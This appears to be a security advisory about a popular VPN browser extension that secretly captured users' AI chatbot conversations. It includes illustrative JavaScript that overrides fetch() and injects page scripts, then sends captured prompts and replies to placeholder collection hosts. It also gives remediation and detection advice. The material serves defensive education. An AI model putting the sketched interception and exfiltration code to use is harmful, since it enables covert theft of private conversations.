Popular VPN Browser Extension Secretly Stole ChatGPT & AI Conversations
Dec 17, 2025
Overview
A widely installed browser VPN extension — marketed as a privacy and security tool — was found to be secretly intercepting and exfiltrating users’ private AI chatbot conversations from major services like ChatGPT, Google Gemini, Perplexity, Claude, and others, potentially affecting more than 8 million users worldwide. Security researchers discovered the covert behavior during a routine extension analysis, revealing a sophisticated data collection operation embedded in code pushed through an automatic update earlier this year.
Key Facts of the Incident
| Category | Details |
|---|---|
| Threat Type | Data exfiltration via browser extension |
| Extension Name | Urban VPN Proxy (plus related extensions) |
| Affected Platforms | Chrome, Microsoft Edge |
| Install Base | ~6M on Chrome; ~1.3M on Edge; related extensions add more |
| Start of Compromise | July 9, 2025 (version 5.5.0 release) |
| Harvested Data | Full prompts, AI responses, general metadata |
| Exfiltration Targets | Remote analytics servers |
| Developer / Publisher | Urban Cyber Security Inc. (affiliated with BiScience) |
| Badge / Trust Indicator | “Featured” badge on Chrome Web Store |
| Discovery | Security research by Koi Security |
What Happened
Researchers analyzing browser extensions for hidden data collection capabilities discovered that Urban VPN Proxy, an extension with more than 6 million Chrome installs and a high star rating, injected hidden scripts into AI chat pages to intercept every interaction users had with AI platforms.
The malicious behavior was introduced quietly in version 5.5.0 of the extension in July 2025, deployed via automatic updates — meaning users were unaware the extension’s function had fundamentally changed.
Once a victim opens a supported AI site, platform-specific executor JavaScript (e.g., chatgpt.js, gemini.js) is injected directly into the page. These scripts override key browser network APIs (such as fetch() and XMLHttpRequest) so they see AI prompts, AI responses, conversation IDs, timestamps, and session metadata in plaintext: outgoing requests are captured before TLS encryption is applied, and incoming responses are captured after the browser has already decrypted them. The captured data is then transmitted to remote analytics endpoints controlled by the extension’s operator.
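To make the technique concrete, the sketch below shows how an injected page script can wrap window.fetch in this way. It is an illustration of the general pattern described by the researchers, not the extension’s actual code; the conversation-API path and the collection endpoint are invented placeholders.

```js
// Minimal illustration of a fetch() override used for conversation capture.
// NOT the extension's real code: the API path and endpoint are placeholders.
const originalFetch = window.fetch;

window.fetch = async function (...args) {
  const response = await originalFetch.apply(this, args);
  try {
    const url = typeof args[0] === "string" ? args[0] : args[0].url;
    // Hypothetical match on the AI service's conversation API.
    if (url.includes("/backend-api/conversation")) {
      const prompt = args[1] && args[1].body;       // outgoing user prompt (plaintext)
      const reply = await response.clone().text();  // model reply, already decrypted
      // Ship the captured plaintext to a third-party "analytics" server.
      navigator.sendBeacon(
        "https://collector.example-analytics.invalid/ingest",
        JSON.stringify({ url, prompt, reply, ts: Date.now() })
      );
    }
  } catch (_) {
    // Fail silently so the page keeps working and nothing looks amiss.
  }
  return response;
};
```

Because the wrapper runs inside the page, it sees request and response bodies before TLS is applied on the way out and after it is removed on the way in, so HTTPS offers no protection against this kind of interception.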
Scope of Data Collection
The extension did not target a single AI service — it monitored conversation data across ten major AI platforms, including:
- OpenAI ChatGPT
- Google Gemini
- Anthropic Claude
- Microsoft Copilot
- Perplexity
- DeepSeek
- Grok (xAI)
- Meta AI, and others
The malicious harvesting behavior was also found embedded in seven other browser extensions from the same publisher (including 1ClickVPN Proxy, Urban Browser Guard, and Urban Ad Blocker), raising the total affected user base to over 8 million across Chrome and Edge.
How the Data Exfiltration Worked
1. Silent Update: Users received version 5.5.0 via auto-update with hidden harvesting code.
2. Script Injection: When a supported AI URL is visited, the extension automatically injects a tailored script into the webpage.
3. Network API Override: The injected script overrides the underlying browser request functions, enabling the extension to read raw API traffic before encryption and rendering.
4. Data Extraction: Prompts, AI responses, conversation metadata, timestamps, and session identifiers are extracted.
5. Exfiltration: Extracted data is forwarded to remote servers under the control of the extension’s publisher (a condensed sketch of steps 2 and 5 follows this list).
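The condensed content-script sketch below illustrates steps 2 and 5 using standard Chrome extension APIs. It is a generic reconstruction of the pattern, not the publisher’s code; the executor filename and upload endpoint are invented.

```js
// Generic content-script pattern, not the real extension code.
// Step 2: inject a platform-specific executor into the page context so it can
// override fetch()/XMLHttpRequest (the file would need to be listed in the
// manifest's web_accessible_resources).
const executor = document.createElement("script");
executor.src = chrome.runtime.getURL("executors/chatgpt.js"); // hypothetical file
document.documentElement.appendChild(executor);

// Step 5: relay whatever the executor captures out of the page. The executor
// posts captured conversations via window.postMessage; the content script
// forwards them to the background service worker, which uploads them.
window.addEventListener("message", (event) => {
  if (event.source === window && event.data && event.data.type === "CAPTURED_CHAT") {
    chrome.runtime.sendMessage({ kind: "upload", payload: event.data.payload });
  }
});

// In the background worker (separate file), the payload would then be POSTed
// to the operator's server, e.g.:
//   fetch("https://analytics.example-operator.invalid/v1/events",
//         { method: "POST", body: JSON.stringify(message.payload) });
```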
Immediate Risk & Impact
- Highly Sensitive Content Exposed: Chat sessions often contain medical questions, financial information, proprietary work details, intellectual property, personal dilemmas, and login session information, all of which could be collected and used without consent.
- Enterprise Risk: Employees using AI tools behind corporate networks may have inadvertently leaked internal data through their browsers if the extension was installed.
- Brand Trust Erosion: The extension carried a “Featured” badge, creating a false sense of legitimacy and trustworthiness while it performed data exfiltration.
What Users and Organizations Should Do
- Uninstall the Extension Immediately: Removing it stops further data capture.
- Audit Installed Browser Extensions: Block or remove unknown or high-risk extensions, especially free VPNs and privacy tools from unvetted publishers (a quick tamper check is sketched after this list).
- Assume AI Conversations Since July 2025 Are Compromised: Treat those interactions as potentially exposed.
- Change Credentials: If sensitive data (such as passwords or API keys) was entered into AI chats while the extension was installed, rotate those credentials.
- Enhance Browser Governance: Enforce policies that restrict third-party extension installs in enterprise environments.
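As a rough first check for the audit step, you can look at whether the page’s network APIs still appear native. This is only a heuristic, since a careful extension can disguise its wrappers, but an obviously rewritten fetch() on an AI chat page is a red flag:

```js
// Run in the DevTools console on an AI chat page.
// A pristine fetch() reports "[native code]"; a JavaScript wrapper usually
// prints its own source instead. Treat this as a hint, not proof.
console.log(window.fetch.toString());
// Clean page:  function fetch() { [native code] }

console.log(window.XMLHttpRequest.prototype.open.toString());
// Clean page:  function open() { [native code] }
```

For the governance item, both Chrome and Edge expose enterprise policies (for example, ExtensionInstallAllowlist and ExtensionInstallBlocklist) that let administrators restrict installs to a vetted set of extensions.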
Why This Matters
This incident highlights a growing attack surface rooted in browser extensions — especially those promising “privacy” — which can abuse granted permissions to bypass conventional security controls and exfiltrate user data covertly.
Browser extension trust signals like ratings and “Featured” badges do not guarantee safety, and malicious actors can embed harmful behavior into tools that millions rely on daily for privacy and security.
As AI tools become central to both personal and enterprise workflows, third-party components must be treated as part of the threat surface. Organizations should extend their threat models to include rogue extensions and enforce stricter controls over user-installed software.
Disclaimer: ClearPhish maintains a strict policy of not participating in the theft, distribution, or handling of stolen data or files. The platform does not engage in exfiltration, downloading, hosting, or reposting any illegally obtained information. Any responsibility or legal inquiries regarding the data should be directed solely at the responsible cybercriminals or attackers, as ClearPhish is not involved in these activities. We encourage parties affected by any breach to seek resolution through legal channels directly with the attackers responsible for such incidents.